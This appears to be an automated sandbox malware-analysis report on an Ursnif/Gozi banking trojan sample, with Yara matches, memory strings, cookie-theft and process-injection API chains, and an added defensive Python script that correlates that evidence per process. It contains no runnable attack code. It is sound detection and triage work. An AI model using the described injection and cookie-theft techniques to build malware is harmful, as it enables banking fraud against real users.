Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.471966557.0000000000DCB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_060222F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_060222F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_060222F7
Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D23C5 NtQueryVirtualMemory, 0_2_6E4D23C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E4F73 GetProcAddress,NtCreateSection,memset, 1_2_032E4F73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_032E11A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E34D0 NtMapViewOfSection, 1_2_032E34D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EB159 NtQueryVirtualMemory, 1_2_032EB159
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06015E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_06015E21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06005E8A NtQueryInformationProcess, 1_2_06005E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_0601C6FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06008F6D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_06008F6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060077B0 NtMapViewOfSection, 1_2_060077B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601FFF2 GetProcAddress,NtCreateSection,memset, 1_2_0601FFF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_0600CCD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_0600E529
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06010D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_06010D8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06022AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_06022AAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_0600F314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06025868 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_06025868
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06022E10 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_06022E10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600E6C4 memset,NtQueryInformationProcess, 1_2_0600E6C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_060117CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06014518 NtGetContextThread,RtlNtStatusToDosError, 1_2_06014518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_060105FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06002A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_06002A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_0600A818
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06003934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_06003934
Source: C:\Windows\System32\control.exe Code function: 37_2_00509B4C NtQueryInformationProcess, 37_2_00509B4C
Source: C:\Windows\System32\control.exe Code function: 37_2_004EF640 NtQueryInformationToken,NtQueryInformationToken,NtClose, 37_2_004EF640
Source: C:\Windows\System32\control.exe Code function: 37_2_00521002 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_00521002
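The native-API chains listed above (NtCreateSection/NtMapViewOfSection, NtWriteVirtualMemory, NtGetContextThread/NtSetContextThread) are the raw evidence behind the "Maps a DLL or memory area into another process" and "Modifies the context of a thread in another process" verdicts, and the Yara hits are reported per memory dump rather than per process. The following Python script is an added triage example, not part of this Joe Sandbox report or its engine: it parses the "Code function" evidence lines, groups the API chains by process index, flags which injection building blocks each process carries, and joins that with the ".sdmp" names from the Yara match lists. The technique labels are this example's own shorthand; the dump-name layout is inferred from the names on this page (only the leading process index, which matches the numeric prefix of the code-function IDs, e.g. 37_2_... in control.exe and the 00000025 dumps, and the base address are interpreted, the two trailing flag fields are left alone). Sample input is copied from the lines above.

```python
import re
from collections import defaultdict

# Constructed sample input, copied from the evidence lines of this report.
# The grouping and technique labels are this added example's own, not
# Joe Sandbox's classification logic.
CODE_FUNCTION_LINES = r"""
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E4F73 GetProcAddress,NtCreateSection,memset, 1_2_032E4F73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E34D0 NtMapViewOfSection, 1_2_032E34D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600F314 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_0600F314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_060117CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06014518 NtGetContextThread,RtlNtStatusToDosError, 1_2_06014518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06002410 CreateProcessAsUserW, 1_2_06002410
Source: C:\Windows\System32\control.exe Code function: 37_2_00521002 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_00521002
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D23C5 NtQueryVirtualMemory, 0_2_6E4D23C5
""".strip().splitlines()

# A subset of the memory-dump names from the "Yara detected Ursnif" lists.
YARA_DUMPS = [
    "00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp",
    "00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp",
    "00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp",
    "0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp",
    "00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp",
    "00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp",
]

CODE_RE = re.compile(
    r"^Source: (?P<image>\S+) Code function: "
    r"(?P<pidx>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+) (?P<apis>[A-Za-z0-9_,]+) "
)
# Dump names as seen on this page: hex process index, a dump phase, a sequence
# number, the region base address, then two flag fields. Only the process index
# (the same number that prefixes the code-function IDs) and the base address
# are interpreted here; the trailing flag fields are deliberately not decoded.
DUMP_RE = re.compile(
    r"^(?P<pidx>[0-9A-Fa-f]{8})\.\d{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.sdmp$"
)

# Native calls that serve as injection building blocks, and the primitive each one provides.
PRIMITIVES = {
    "NtCreateSection": "section",
    "NtMapViewOfSection": "map",
    "NtAllocateVirtualMemory": "alloc",
    "NtWriteVirtualMemory": "write",
    "NtProtectVirtualMemory": "protect",
    "NtGetContextThread": "ctx_get",
    "NtSetContextThread": "ctx_set",
}

# A technique is evidenced when every one of its primitives occurs in one process.
# Labels are this example's shorthand for the two patterns visible in the report.
TECHNIQUES = {
    "section-mapping injection": frozenset({"section", "map"}),
    "thread-context hijacking": frozenset({"write", "ctx_set"}),
}


def parse_code_functions(lines):
    """Return ({pidx: image name}, {pidx: {function address: [api, ...]}})."""
    images, chains = {}, defaultdict(dict)
    for line in lines:
        m = CODE_RE.match(line)
        if not m:
            continue
        pidx = int(m["pidx"])
        images[pidx] = m["image"].rsplit("\\", 1)[-1]
        chains[pidx][int(m["addr"], 16)] = [a for a in m["apis"].split(",") if a]
    return images, chains


def parse_dumps(names):
    """Return {pidx: [region base address, ...]} for well-formed .sdmp names."""
    bases = defaultdict(list)
    for name in names:
        m = DUMP_RE.match(name)
        if m:
            bases[int(m["pidx"], 16)].append(int(m["base"], 16))
    return bases


def techniques_for(chains):
    """Sorted technique labels whose primitive set is fully present in the chains."""
    prims = {PRIMITIVES[a] for apis in chains.values() for a in apis if a in PRIMITIVES}
    return sorted(t for t, need in TECHNIQUES.items() if need <= prims)


def correlate(code_lines, dump_names):
    """Join injection evidence and Yara-matched dump regions per process index."""
    images, chains = parse_code_functions(code_lines)
    bases = parse_dumps(dump_names)
    report = {}
    for pidx in sorted(set(images) | set(bases)):
        report[pidx] = {
            "image": images.get(pidx, f"index {pidx}"),
            "techniques": techniques_for(chains.get(pidx, {})),
            "dump_bases": sorted(bases.get(pidx, [])),
        }
    return report


if __name__ == "__main__":
    for pidx, info in correlate(CODE_FUNCTION_LINES, YARA_DUMPS).items():
        print(pidx, info["image"], info["techniques"],
              [hex(b) for b in info["dump_bases"]])
```

Run against the sample, rundll32.exe (index 1) comes out with both the section-mapping and the thread-context-hijacking primitive sets and a Yara-matched dump based at 0x06000000, the same region the 1_2_060xxxxx injection functions above live in; control.exe (index 37, the 00000025 dumps) carries Yara hits but only NtProtectVirtualMemory, consistent with it being a target that received the payload rather than the injector. Indices that appear only in dump names (0x24, explorer.exe by the string evidence higher up) are reported by number so the join never silently drops a process.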
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06002410 CreateProcessAsUserW, 1_2_06002410
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D21A4 0_2_6E4D21A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E9AD7 0_2_6E4E9AD7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F0EB0 0_2_6E4F0EB0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E477E 0_2_6E4E477E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F13F4 0_2_6E4F13F4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EA78C 0_2_6E4EA78C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EA380 0_2_6E4EA380
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E9FAC 0_2_6E4E9FAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EABAC 0_2_6E4EABAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4EC0E8 0_2_6E4EC0E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F309D 0_2_6E4F309D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F1938 0_2_6E4F1938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EAF34 1_2_032EAF34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E28E9 1_2_032E28E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06013604 1_2_06013604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06021669 1_2_06021669
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06012678 1_2_06012678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060276B0 1_2_060276B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601CFA3 1_2_0601CFA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06023C5C 1_2_06023C5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0601BC93 1_2_0601BC93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600C307 1_2_0600C307
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600BBA1 1_2_0600BBA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06014804 1_2_06014804
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602086C 1_2_0602086C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F5890 37_2_004F5890
Source: C:\Windows\System32\control.exe Code function: 37_2_004F6B80 37_2_004F6B80
Source: C:\Windows\System32\control.exe Code function: 37_2_004F2854 37_2_004F2854
Source: C:\Windows\System32\control.exe Code function: 37_2_004F386C 37_2_004F386C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F206C 37_2_004F206C
Source: C:\Windows\System32\control.exe Code function: 37_2_004FE808 37_2_004FE808
Source: C:\Windows\System32\control.exe Code function: 37_2_0050E038 37_2_0050E038
Source: C:\Windows\System32\control.exe Code function: 37_2_004E78F0 37_2_004E78F0
Source: C:\Windows\System32\control.exe Code function: 37_2_0050E09C 37_2_0050E09C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F11DC 37_2_004F11DC
Source: C:\Windows\System32\control.exe Code function: 37_2_004E49BC 37_2_004E49BC
Source: C:\Windows\System32\control.exe Code function: 37_2_0050FA10 37_2_0050FA10
Source: C:\Windows\System32\control.exe Code function: 37_2_00506A28 37_2_00506A28
Source: C:\Windows\System32\control.exe Code function: 37_2_004E42CC 37_2_004E42CC
Source: C:\Windows\System32\control.exe Code function: 37_2_004FAACC 37_2_004FAACC
